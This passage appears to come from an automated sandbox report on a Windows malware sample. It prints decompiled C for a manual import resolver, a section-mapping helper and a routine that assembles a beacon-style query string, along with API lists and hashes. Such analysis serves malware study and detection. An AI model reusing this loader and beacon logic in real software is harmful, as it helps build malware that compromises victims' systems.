• Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
Similarity
• API ID: Language$DefaultInfoLocaleNameSystem
• String ID:
• API String ID: 3724080410-0
• Opcode ID: 27c2a0a0a1e0281b0c74014c6bf814840f39e2f0b9c9c23a7a81d5b8878b7861
• Instruction ID: de5faab829ae3d30bad3af8dc5aa8a4f7bafe5a72591d950d2fdc314551fc97e
• Opcode Fuzzy Hash: 27c2a0a0a1e0281b0c74014c6bf814840f39e2f0b9c9c23a7a81d5b8878b7861
• Instruction Fuzzy Hash: 0DE04878640704F6E700DBD1DD0AFBD73BC970474AF500044F701D61C0D6749A08D725
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E6E051F31(void* __edi, intOrPtr _a4) {
	signed int _v8;
	intOrPtr* _v12;
	_Unknown_base(*)()** _v16;
	signed int _v20;
	signed short _v24;
	struct HINSTANCE__* _v28;
	intOrPtr _t43;
	intOrPtr* _t45;
	intOrPtr _t46;
	struct HINSTANCE__* _t47;
	intOrPtr* _t49;
	intOrPtr _t50;
	signed short _t51;
	_Unknown_base(*)()* _t53;
	CHAR* _t54;
	_Unknown_base(*)()* _t55;
	void* _t58;
                                                                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t60;
                                                                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                                                                                    				signed int _t68;
                                                                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                                                                    				CHAR* _t71;
                                                                                                                                                                                                                                                                                    				signed short* _t73;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t69 = __edi;
                                                                                                                                                                                                                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                                                                    				_t59 =  *0x6e0541cc;
                                                                                                                                                                                                                                                                                    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                                                                                                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                                                                                                                                    					_t45 = _t43 + __edi;
                                                                                                                                                                                                                                                                                    					_v12 = _t45;
                                                                                                                                                                                                                                                                                    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                                                                                                                                    					if(_t46 != 0) {
                                                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                                                    							_t71 = _t46 + _t69;
                                                                                                                                                                                                                                                                                    							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                                                                                                                                                                                    							_v28 = _t47;
                                                                                                                                                                                                                                                                                    							if(_t47 == 0) {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                                                    							 *_t71 = _t59 - 0x63699bc3;
                                                                                                                                                                                                                                                                                    							_t49 = _v12;
                                                                                                                                                                                                                                                                                    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                                                                                                                                                                    							_t50 =  *_t49;
                                                                                                                                                                                                                                                                                    							if(_t50 != 0) {
                                                                                                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                                                                                                    								_t73 = _t50 + _t69;
                                                                                                                                                                                                                                                                                    								_v16 = _t61 + _t69;
                                                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                                                    									_t51 =  *_t73;
                                                                                                                                                                                                                                                                                    									if(_t51 == 0) {
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									if(__eflags < 0) {
                                                                                                                                                                                                                                                                                    										__eflags = _t51 - _t69;
                                                                                                                                                                                                                                                                                    										if(_t51 < _t69) {
                                                                                                                                                                                                                                                                                    											L12:
                                                                                                                                                                                                                                                                                    											_t21 =  &_v8;
                                                                                                                                                                                                                                                                                    											 *_t21 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                    											__eflags =  *_t21;
                                                                                                                                                                                                                                                                                    											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											_t65 = _a4;
                                                                                                                                                                                                                                                                                    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                                                                                                                                                                                    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                                                                                                                                                                                    												goto L12;
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												goto L11;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										_t51 = _t51 + _t69;
                                                                                                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                                                                                                    										_v8 = _t51;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t53 = _v8;
                                                                                                                                                                                                                                                                                    									__eflags = _t53;
                                                                                                                                                                                                                                                                                    									if(_t53 == 0) {
                                                                                                                                                                                                                                                                                    										_t54 = _v24 & 0x0000ffff;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										_t54 = _t53 + 2;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                                                                                                                                                                                    									__eflags = _t55;
                                                                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                    										_v20 = _t59 - 0x63699b44;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										_t68 = _v8;
                                                                                                                                                                                                                                                                                    										__eflags = _t68;
                                                                                                                                                                                                                                                                                    										if(_t68 != 0) {
                                                                                                                                                                                                                                                                                    											 *_t68 = _t59 - 0x63699bc3;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										 *_v16 = _t55;
                                                                                                                                                                                                                                                                                    										_t58 = 0x725990f8 + _t59 * 4;
                                                                                                                                                                                                                                                                                    										_t73 = _t73 + _t58;
                                                                                                                                                                                                                                                                                    										_t32 =  &_v16;
                                                                                                                                                                                                                                                                                    										 *_t32 = _v16 + _t58;
                                                                                                                                                                                                                                                                                    										__eflags =  *_t32;
                                                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t50 = _t61;
                                                                                                                                                                                                                                                                                    								if(_t61 != 0) {
                                                                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                                                                    							_v12 = _v12 + 0x14;
                                                                                                                                                                                                                                                                                    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L26:
                                                                                                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t60 = _t59 + 0x9c9664bb;
                                                                                                                                                                                                                                                                                    						__eflags = _t60;
                                                                                                                                                                                                                                                                                    						_v20 = _t60;
                                                                                                                                                                                                                                                                                    						goto L26;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L27:
                                                                                                                                                                                                                                                                                    				return _v20;
                                                                                                                                                                                                                                                                                    			}


                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E051F69
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 6E051FDB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2574300362-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a8faca7362876f8f6badb9cd5f3c06ee17d4735f7c186e44d87197511c974449
                                                                                                                                                                                                                                                                                    • Instruction ID: 247a33f3aa2b283abb733da0036396871d792ef1f23ab563205e53c8ac8a547d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8faca7362876f8f6badb9cd5f3c06ee17d4735f7c186e44d87197511c974449
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB313471A0120ADFEB44CF99CA84BAEB7F4BF09344B104069D811E7341E774DA64CB90
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E6E051B89(void** __esi, PVOID* _a4) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				long _t13;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                                                                                                                                    				if(_t13 < 0) {
                                                                                                                                                                                                                                                                                    					_push(_t13);
                                                                                                                                                                                                                                                                                    					return __esi[6]();
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E051943,00000002,00000000,?,?,00000000,?,?,6E051943,00000000), ref: 6E051BB6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: SectionView
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1323581903-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                                                                    • Instruction ID: b8043cd67e4f7375274e169b54344a73b6dc827e4867957181891c157c15ac2c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAF012B590060DFFEB119FA5CC89D9FBBFDEB44354B104939B552E2190E6309E189B60
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                                                                    			E00FC6DB7(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				long _t63;
                                                                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                                                                    				int _t75;
                                                                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                                                                                                    				intOrPtr _t81;
                                                                                                                                                                                                                                                                                    				intOrPtr _t85;
                                                                                                                                                                                                                                                                                    				intOrPtr _t86;
                                                                                                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                                                                                                                    				intOrPtr _t95;
                                                                                                                                                                                                                                                                                    				intOrPtr _t99;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t101;
                                                                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                                                                    				void* _t107;
                                                                                                                                                                                                                                                                                    				intOrPtr _t112;
signed int _t116;
char** _t118;
int _t121;
signed int _t123;
intOrPtr* _t124;
intOrPtr* _t126;
intOrPtr* _t128;
intOrPtr* _t130;
intOrPtr _t133;
intOrPtr _t136;
int _t139;
intOrPtr _t140;
int _t143;
void* _t144;
void* _t145;
void* _t155;
int _t158;
void* _t159;
void* _t160;
void* _t161;
intOrPtr _t162;
void* _t164;
long _t168;
intOrPtr* _t169;
intOrPtr* _t172;
void* _t173;
void* _t175;
void* _t176;
void* _t181;

_t155 = __edx;
_t145 = __ecx;
_t63 = __eax;
_t144 = _a20;
_a20 = 8;
if(__eax == 0) {
	_t63 = GetTickCount();
}
_t64 =  *0xfca018; // 0x785c6176
asm("bswap eax");
_t65 =  *0xfca014; // 0x5cb11ae7
asm("bswap eax");
_t66 =  *0xfca010; // 0x15dc9586
asm("bswap eax");
_t67 =  *0xfca00c; // 0x67522d90
asm("bswap eax");
_t68 =  *0xfca2d0; // 0x292d5a8
_t3 = _t68 + 0xfcb622; // 0x74666f73
_t158 = wsprintfA(_t144, _t3, 3, 0x3d14c, _t67, _t66, _t65, _t64,  *0xfca02c,  *0xfca004, _t63);
_t71 = E00FC271A();
_t72 =  *0xfca2d0; // 0x292d5a8
_t4 = _t72 + 0xfcb662; // 0x74707526
_t75 = wsprintfA(_t158 + _t144, _t4, _t71);
_t175 = _t173 + 0x38;
_t159 = _t158 + _t75;
if(_a8 != 0) {
	_t140 =  *0xfca2d0; // 0x292d5a8
	_t8 = _t140 + 0xfcb66d; // 0x732526
	_t143 = wsprintfA(_t159 + _t144, _t8, _a8);
	_t175 = _t175 + 0xc;
	_t159 = _t159 + _t143;
}
_t76 = E00FC2956(_t145);
_t77 =  *0xfca2d0; // 0x292d5a8
_t10 = _t77 + 0xfcb38a; // 0x6d697426
_t160 = _t159 + wsprintfA(_t159 + _t144, _t10, _t76, _t155);
_t81 =  *0xfca2d0; // 0x292d5a8
_t12 = _t81 + 0xfcb7b4; // 0x38f8d5c
_t181 = _a4 - _t12;
_t14 = _t81 + 0xfcb33b; // 0x74636126
_t157 = 0 | _t181 == 0x00000000;
_t161 = _t160 + wsprintfA(_t160 + _t144, _t14, _t181 == 0);
_t85 =  *0xfca318; // 0x38f95e0
_t176 = _t175 + 0x1c;
if(_t85 != 0) {
	_t136 =  *0xfca2d0; // 0x292d5a8
	_t18 = _t136 + 0xfcb8ea; // 0x3d736f26
	_t139 = wsprintfA(_t161 + _t144, _t18, _t85);
	_t176 = _t176 + 0xc;
	_t161 = _t161 + _t139;
}
_t86 =  *0xfca328; // 0x38f95b0
if(_t86 != 0) {
	_t133 =  *0xfca2d0; // 0x292d5a8
	_t20 = _t133 + 0xfcb685; // 0x73797326
	wsprintfA(_t161 + _t144, _t20, _t86);
	_t176 = _t176 + 0xc;
}
_t162 =  *0xfca37c; // 0x38f9630
_t88 = E00FC5741(0xfca00a, _t162 + 4);
_t168 = 0;
_v12 = _t88;
if(_t88 == 0) {
	L28:
	RtlFreeHeap( *0xfca290, _t168, _t144); // executed
	return _a20;
} else {
	_t91 = RtlAllocateHeap( *0xfca290, 0, 0x800);
	_a8 = _t91;
	if(_t91 == 0) {
		L27:
		HeapFree( *0xfca290, _t168, _v12);
		goto L28;
	}
	E00FC1A51(GetTickCount());
	_t95 =  *0xfca37c; // 0x38f9630
	__imp__(_t95 + 0x40);
	asm("lock xadd [eax], ecx");
	_t99 =  *0xfca37c; // 0x38f9630
	__imp__(_t99 + 0x40);
	_t101 =  *0xfca37c; // 0x38f9630
	_t102 = E00FC5AE3(1, _t157, _t144,  *_t101); // executed
	_t164 = _t102;
	_v20 = _t164;
	asm("lock xadd [eax], ecx");
	if(_t164 == 0) {
		L26:
		RtlFreeHeap( *0xfca290, _t168, _a8); // executed
		goto L27;
	}
                                                                                                                                                                                                                                                                                    					StrTrimA(_t164, 0xfc92cc);
                                                                                                                                                                                                                                                                                    					_push(_t164);
                                                                                                                                                                                                                                                                                    					_t107 = E00FC2829();
                                                                                                                                                                                                                                                                                    					_v8 = _t107;
                                                                                                                                                                                                                                                                                    					if(_t107 == 0) {
                                                                                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                                                                                    						RtlFreeHeap( *0xfca290, _t168, _t164); // executed
                                                                                                                                                                                                                                                                                    						goto L26;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					 *_t164 = 0;
                                                                                                                                                                                                                                                                                    					__imp__(_a8, _v12);
                                                                                                                                                                                                                                                                                    					_t169 = __imp__;
                                                                                                                                                                                                                                                                                    					 *_t169(_a8, _v8);
                                                                                                                                                                                                                                                                                    					 *_t169(_a8, _t164);
                                                                                                                                                                                                                                                                                    					_t112 = E00FC33FA(0, _a8);
                                                                                                                                                                                                                                                                                    					_a4 = _t112;
                                                                                                                                                                                                                                                                                    					if(_t112 == 0) {
                                                                                                                                                                                                                                                                                    						_a20 = 8;
                                                                                                                                                                                                                                                                                    						L23:
                                                                                                                                                                                                                                                                                    						E00FC2813();
                                                                                                                                                                                                                                                                                    						L24:
                                                                                                                                                                                                                                                                                    						RtlFreeHeap( *0xfca290, 0, _v8); // executed
                                                                                                                                                                                                                                                                                    						_t168 = 0;
                                                                                                                                                                                                                                                                                    						goto L25;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t116 = E00FC5C63(_t144, 0xffffffffffffffff, _t164,  &_v16); // executed
                                                                                                                                                                                                                                                                                    					_a20 = _t116;
                                                                                                                                                                                                                                                                                    					if(_t116 == 0) {
                                                                                                                                                                                                                                                                                    						_t172 = _v16;
                                                                                                                                                                                                                                                                                    						_t123 = E00FC1671(_t172, _a4, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                    						_a20 = _t123;
                                                                                                                                                                                                                                                                                    						_t124 =  *((intOrPtr*)(_t172 + 8));
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t124 + 0x80))(_t124);
                                                                                                                                                                                                                                                                                    						_t126 =  *((intOrPtr*)(_t172 + 8));
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                                                                                                                                                                                                                                                    						_t128 =  *((intOrPtr*)(_t172 + 4));
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t128 + 8))(_t128);
                                                                                                                                                                                                                                                                                    						_t130 =  *_t172;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t130 + 8))(_t130);
                                                                                                                                                                                                                                                                                    						E00FC2A03(_t172);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_a20 != 0x10d2) {
                                                                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                                                                    						if(_a20 == 0) {
                                                                                                                                                                                                                                                                                    							_t118 = _a12;
                                                                                                                                                                                                                                                                                    							if(_t118 != 0) {
                                                                                                                                                                                                                                                                                    								_t165 =  *_t118;
                                                                                                                                                                                                                                                                                    								_t170 =  *_a16;
                                                                                                                                                                                                                                                                                    								wcstombs( *_t118,  *_t118,  *_a16);
                                                                                                                                                                                                                                                                                    								_t121 = E00FC6459(_t165, _t165, _t170 >> 1);
                                                                                                                                                                                                                                                                                    								_t164 = _v20;
                                                                                                                                                                                                                                                                                    								 *_a16 = _t121;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						if(_a12 != 0) {
                                                                                                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                                                                                                    							E00FC2A03(_a4);
                                                                                                                                                                                                                                                                                    							if(_a20 == 0 || _a20 == 0x10d2) {
                                                                                                                                                                                                                                                                                    								goto L24;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								goto L23;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_a20 = _a20 & 0x00000000;
                                                                                                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                                                                    0x00fc6e87
                                                                                                                                                                                                                                                                                    0x00fc6e8a
                                                                                                                                                                                                                                                                                    0x00fc6e90
                                                                                                                                                                                                                                                                                    0x00fc6e9b
                                                                                                                                                                                                                                                                                    0x00fc6e9d
                                                                                                                                                                                                                                                                                    0x00fc6ea2
                                                                                                                                                                                                                                                                                    0x00fc6ea7
                                                                                                                                                                                                                                                                                    0x00fc6eaa
                                                                                                                                                                                                                                                                                    0x00fc6eaf
                                                                                                                                                                                                                                                                                    0x00fc6eba
                                                                                                                                                                                                                                                                                    0x00fc6ebc
                                                                                                                                                                                                                                                                                    0x00fc6ebf
                                                                                                                                                                                                                                                                                    0x00fc6ebf
                                                                                                                                                                                                                                                                                    0x00fc6ec1
                                                                                                                                                                                                                                                                                    0x00fc6ec8
                                                                                                                                                                                                                                                                                    0x00fc6ecb
                                                                                                                                                                                                                                                                                    0x00fc6ed0
                                                                                                                                                                                                                                                                                    0x00fc6eda
                                                                                                                                                                                                                                                                                    0x00fc6edc
                                                                                                                                                                                                                                                                                    0x00fc6edc
                                                                                                                                                                                                                                                                                    0x00fc6edf
                                                                                                                                                                                                                                                                                    0x00fc6eed
                                                                                                                                                                                                                                                                                    0x00fc6ef2
                                                                                                                                                                                                                                                                                    0x00fc6ef6
                                                                                                                                                                                                                                                                                    0x00fc6ef9
                                                                                                                                                                                                                                                                                    0x00fc70c5
                                                                                                                                                                                                                                                                                    0x00fc70cd
                                                                                                                                                                                                                                                                                    0x00fc70da
                                                                                                                                                                                                                                                                                    0x00fc6eff
                                                                                                                                                                                                                                                                                    0x00fc6f0b
                                                                                                                                                                                                                                                                                    0x00fc6f13
                                                                                                                                                                                                                                                                                    0x00fc6f16
                                                                                                                                                                                                                                                                                    0x00fc70b5
                                                                                                                                                                                                                                                                                    0x00fc70bf
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc70bf
                                                                                                                                                                                                                                                                                    0x00fc6f22
                                                                                                                                                                                                                                                                                    0x00fc6f27
                                                                                                                                                                                                                                                                                    0x00fc6f30
                                                                                                                                                                                                                                                                                    0x00fc6f41
                                                                                                                                                                                                                                                                                    0x00fc6f45
                                                                                                                                                                                                                                                                                    0x00fc6f4e
                                                                                                                                                                                                                                                                                    0x00fc6f54
                                                                                                                                                                                                                                                                                    0x00fc6f5c
                                                                                                                                                                                                                                                                                    0x00fc6f61
                                                                                                                                                                                                                                                                                    0x00fc6f68
                                                                                                                                                                                                                                                                                    0x00fc6f71
                                                                                                                                                                                                                                                                                    0x00fc6f77
                                                                                                                                                                                                                                                                                    0x00fc70a5
                                                                                                                                                                                                                                                                                    0x00fc70af
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc70af
                                                                                                                                                                                                                                                                                    0x00fc6f83
                                                                                                                                                                                                                                                                                    0x00fc6f89
                                                                                                                                                                                                                                                                                    0x00fc6f8a
                                                                                                                                                                                                                                                                                    0x00fc6f91
                                                                                                                                                                                                                                                                                    0x00fc6f94
                                                                                                                                                                                                                                                                                    0x00fc7097
                                                                                                                                                                                                                                                                                    0x00fc709f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc709f
                                                                                                                                                                                                                                                                                    0x00fc6f9d
                                                                                                                                                                                                                                                                                    0x00fc6fa3
                                                                                                                                                                                                                                                                                    0x00fc6fac
                                                                                                                                                                                                                                                                                    0x00fc6fb5
                                                                                                                                                                                                                                                                                    0x00fc6fbb
                                                                                                                                                                                                                                                                                    0x00fc6fc2
                                                                                                                                                                                                                                                                                    0x00fc6fc9
                                                                                                                                                                                                                                                                                    0x00fc6fcc
                                                                                                                                                                                                                                                                                    0x00fc70dd
                                                                                                                                                                                                                                                                                    0x00fc707f
                                                                                                                                                                                                                                                                                    0x00fc707f
                                                                                                                                                                                                                                                                                    0x00fc7084
                                                                                                                                                                                                                                                                                    0x00fc708f
                                                                                                                                                                                                                                                                                    0x00fc7095
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc7095
                                                                                                                                                                                                                                                                                    0x00fc6fd6
                                                                                                                                                                                                                                                                                    0x00fc6fdd
                                                                                                                                                                                                                                                                                    0x00fc6fe0
                                                                                                                                                                                                                                                                                    0x00fc6fe5
                                                                                                                                                                                                                                                                                    0x00fc6ff0
                                                                                                                                                                                                                                                                                    0x00fc6ff5
                                                                                                                                                                                                                                                                                    0x00fc6ff8
                                                                                                                                                                                                                                                                                    0x00fc6ffe
                                                                                                                                                                                                                                                                                    0x00fc7004
                                                                                                                                                                                                                                                                                    0x00fc700a
                                                                                                                                                                                                                                                                                    0x00fc700d
                                                                                                                                                                                                                                                                                    0x00fc7013
                                                                                                                                                                                                                                                                                    0x00fc7016
                                                                                                                                                                                                                                                                                    0x00fc701b
                                                                                                                                                                                                                                                                                    0x00fc701f
                                                                                                                                                                                                                                                                                    0x00fc701f
                                                                                                                                                                                                                                                                                    0x00fc702b
                                                                                                                                                                                                                                                                                    0x00fc7037
                                                                                                                                                                                                                                                                                    0x00fc703b
                                                                                                                                                                                                                                                                                    0x00fc703d
                                                                                                                                                                                                                                                                                    0x00fc7042

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00FC6DCE
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC6E1B
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC6E38
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC6E58
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC6E76
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC6E99
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC6EBA
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC6EDA
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FC6F0B
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00FC6F1C
                                                                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(038F95F0), ref: 00FC6F30
                                                                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(038F95F0), ref: 00FC6F4E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B0E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5AE3: lstrlen.KERNEL32(00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B16
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5AE3: strcpy.NTDLL ref: 00FC5B2D
